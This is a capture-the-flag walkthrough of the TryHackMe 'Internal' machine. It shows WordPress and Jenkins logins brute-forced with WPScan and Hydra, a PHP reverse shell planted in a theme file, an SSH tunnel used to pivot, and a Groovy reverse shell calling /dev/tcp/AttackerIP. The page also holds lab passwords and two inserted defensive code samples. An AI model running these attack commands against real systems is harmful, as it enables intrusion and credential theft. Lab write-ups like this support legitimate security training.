Topics: Cybersecurity, Penetration Testing, TryHackMe, Ethical Hacking, WordPress

Introduction

Internal is an intermediate-level boot-to-root challenge that tests your skills in web application exploitation, privilege escalation, and network pivoting. This walkthrough will guide you through compromising a WordPress installation, leveraging SSH tunneling to access internal services, and exploiting Jenkins for root access.

Difficulty: Medium

Target: Internal.thm

Initial Reconnaissance

Let's start with a comprehensive Nmap scan to identify open ports and services:

sudo nmap -sC -sV -A 10.48.129.117

Discovered Services

• Port 22: SSH (OpenSSH 7.6p1 Ubuntu 4ubuntu0.3)

• Port 80: HTTP (Apache httpd 2.4.29)

We also run Nikto for web vulnerability scanning:

nikto -h internal.thm

Web Enumeration

Directory Brute-forcing

Using multiple tools to discover hidden directories:

feroxbuster -u 'http://10.48.129.117' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

gobuster dir --url "http://internal.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

WordPress Discovery

A WordPress installation is found at /blog/. Let's enumerate it:

wpscan --url http://internal.thm/blog/

WordPress Exploitation

Brute-forcing WordPress Admin

Having discovered the admin username, we proceed with password brute-forcing:

wpscan --url "http://internal.thm/blog/" -U "admin" -P /usr/share/wordlists/rockyou.txt

Successfully obtained credentials!

Getting a Reverse Shell

With admin access, we can inject a PHP reverse shell:

1. Navigate to Appearance → Theme Editor → 404.php

2. Replace the content with a PHP reverse shell from pentestmonkey's repo:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

3. Set up a listener:

nc -nvlp 4444

4. Trigger the shell by visiting the 404 page

Shell Stabilization

Once we get the reverse shell, upgrade to a proper TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation — First User

Enumeration with LinPEAS

Transfer and run LinPEAS for automated enumeration:

https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS

On attacker machine:

python3 -m http.server

On target machine:

wget http://attackerIP:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Found Credentials

LinPEAS reveals credentials in /opt/:

www-data@internal:/opt$ cat wp-save.txt

aubreanna:bubb13guM!@#123

SSH Access

Login via SSH with the discovered credentials:

ssh aubreanna@10.48.129.117

Network Pivoting

Internal Jenkins Service

After logging in as aubreanna, we find an interesting note:

aubreanna@internal:~$ cat jenkins.txt

Internal Jenkins service is running on 172.17.0.2:8080

The address 172.17.0.2 is part of Docker's internal network, inaccessible directly from our machine. We need to pivot!

SSH Port Forwarding

We'll create an SSH tunnel to access the internal Jenkins service:

ssh -N -L 1234:172.17.0.2:8080 aubreanna@10.48.185.39

Flag breakdown:

• -N → No shell (clean tunnel, no command execution)

• -L → Local port forwarding (our port 1234 → target's 172.17.0.2:8080)
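From the defender's side, whether this forward works is decided by the AllowTcpForwarding and PermitOpen settings sshd applies to the account. The added example below (not part of the original walkthrough) resolves those two keywords for a user from sshd_config text. The two configs and the "deploy" account are constructed, and only Match User and Match All blocks are evaluated.

```python
from fnmatch import fnmatch

# sshd's built-in defaults for the two keywords that govern `ssh -L`.
DEFAULTS = {"allowtcpforwarding": "yes", "permitopen": "any"}

# Constructed configs. "deploy" is a hypothetical account that needs one forward.
DEFAULT_CONFIG = "PasswordAuthentication yes\n"
HARDENED_CONFIG = """
AllowTcpForwarding no          # global: no forwarding for anyone
Match User deploy
    AllowTcpForwarding local
    PermitOpen 10.0.0.5:5432
"""

def effective(config_text, user):
    """Resolve the keywords sshd would apply to `user`.

    Only `Match User` and `Match All` are evaluated; blocks using other
    criteria are treated as not matching (assumption of this example).
    """
    global_kw, match_kw = {}, {}
    target = global_kw
    for raw in config_text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if not parts:
            continue
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            crit = value.split()
            if crit and crit[0].lower() == "all":
                target = match_kw
            elif len(crit) == 2 and crit[0].lower() == "user":
                hit = any(fnmatch(user, p) for p in crit[1].split(","))
                target = match_kw if hit else None
            else:
                target = None
        elif target is not None:
            target.setdefault(key, value)  # first obtained value wins
    # Keywords from satisfied Match blocks override the global section.
    return {**DEFAULTS, **global_kw, **match_kw}

def local_forward_allowed(config_text, user, dest):
    """True if `ssh -L <port>:<dest>` would be accepted for `user`."""
    eff = effective(config_text, user)
    if eff["allowtcpforwarding"].lower() not in ("yes", "all", "local"):
        return False
    rules = eff["permitopen"].split()
    if "none" in rules:
        return False
    return "any" in rules or any(fnmatch(dest, r) for r in rules)
```

With the default config the forward to 172.17.0.2:8080 is accepted for aubreanna; with the hardened one it is refused, and "deploy" can reach only its single permitted destination.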

Verify the Tunnel

Scan localhost to confirm Jenkins is accessible:

nmap -sCV -p 1234 localhost

Results:

PORT STATE SERVICE VERSION

1234/tcp open http Jetty 9.4.30.v20200611

|_http-server-header: Jetty(9.4.30.v20200611)

|_http-title: Site doesn't have a title (text/html;charset=utf-8).

| http-robots.txt: 1 disallowed entry

Jenkins Exploitation

Directory Enumeration

gobuster dir --url "http://localhost:1234/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Vulnerability Scanning

nikto -h localhost:1234

Brute-forcing Jenkins Login

Using Hydra to crack the Jenkins admin password:

hydra localhost -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -s 1234 -V -l admin -P /usr/share/wordlists/rockyou.txt
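Both password-guessing steps on this page (WPScan against the WordPress login and Hydra against the Jenkins login form) leave the same trace in a web access log: a burst of POSTs from one client to a login endpoint. The added example below (not part of the original walkthrough) detects that burst in Apache combined-format lines. The log lines, addresses, threshold and window are constructed, and it assumes the Jenkins requests are logged in the same format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Login endpoints on this page: WordPress form/XML-RPC login, Jenkins form login.
AUTH_PATHS = ("/wp-login.php", "/xmlrpc.php", "/j_acegi_security_check")

def _line(ip, sec, path, status):
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] '
            f'"POST {path} HTTP/1.1" {status} 512 "-" "constructed-agent"')

# Constructed sample: a guessing run ending in a 302, one ordinary login, and a
# Jenkins run whose source is the SSH host's bridge address (tunnelled traffic).
SAMPLE = ([_line("203.0.113.7", s, "/blog/wp-login.php", 200) for s in range(6)]
          + [_line("203.0.113.7", 6, "/blog/wp-login.php", 302),
             _line("198.51.100.4", 10, "/blog/wp-login.php", 302)]
          + [_line("172.17.0.1", s, "/j_acegi_security_check", 302)
             for s in range(20, 28)])

def parse(line):
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    path = m["path"].split("?")[0]
    if not path.endswith(AUTH_PATHS):
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return (m["ip"], path), (ts, int(m["status"]))

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (client, endpoint) pairs with >= threshold login POSTs inside window."""
    events = defaultdict(list)
    for key, ev in filter(None, map(parse, lines)):
        events[key].append(ev)
    alerts = {}
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                # wp-login.php answers a failed login with 200, a good one with 302;
                # on the other endpoints the status is not used as a success signal.
                wp = key[1].endswith("/wp-login.php")
                hit = wp and any(s == 302 for _, s in evs[end:])
                alerts[key] = {"attempts": len(evs), "success_after_burst": hit}
                break
    return alerts
```

An alert with success_after_burst set is the one to triage first: the guessing run ended with a redirect, so the account's password should be treated as known to the client.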

Getting Root Shell via Script Console

With Jenkins admin access, we can execute Groovy scripts:

1. Navigate to Jenkins → Manage Jenkins → Script Console

2. Execute the following Groovy reverse shell:

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/AttackerIP/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

3. Set up a listener on your machine:

nc -nvlp 4444

Root Credentials

After getting the shell, check /opt/ for the final credentials:

cd /opt

cat note.txt

Root credentials found:

root:tr0ub13guM!@#123

═══════════════════════════════════════════════════════════════════

Summary

This machine required a multi-stage attack:

1. WordPress brute-force → Initial foothold via theme editor reverse shell

2. LinPEAS enumeration → Discovered user credentials

3. SSH pivoting → Accessed internal Jenkins service via port forwarding

4. Jenkins exploitation → Used Script Console for root shell

Key Takeaways

• Always enumerate internal services mentioned in found files

• SSH tunneling is powerful for accessing internal networks

• Jenkins Script Console is a direct path to code execution

• Credential reuse is common — always try discovered passwords elsewhere

Tools Used

• Nmap

• Nikto

• Feroxbuster

• Gobuster

• WPScan

• Hydra

• LinPEAS

• Netcat

Happy Hacking! 🔓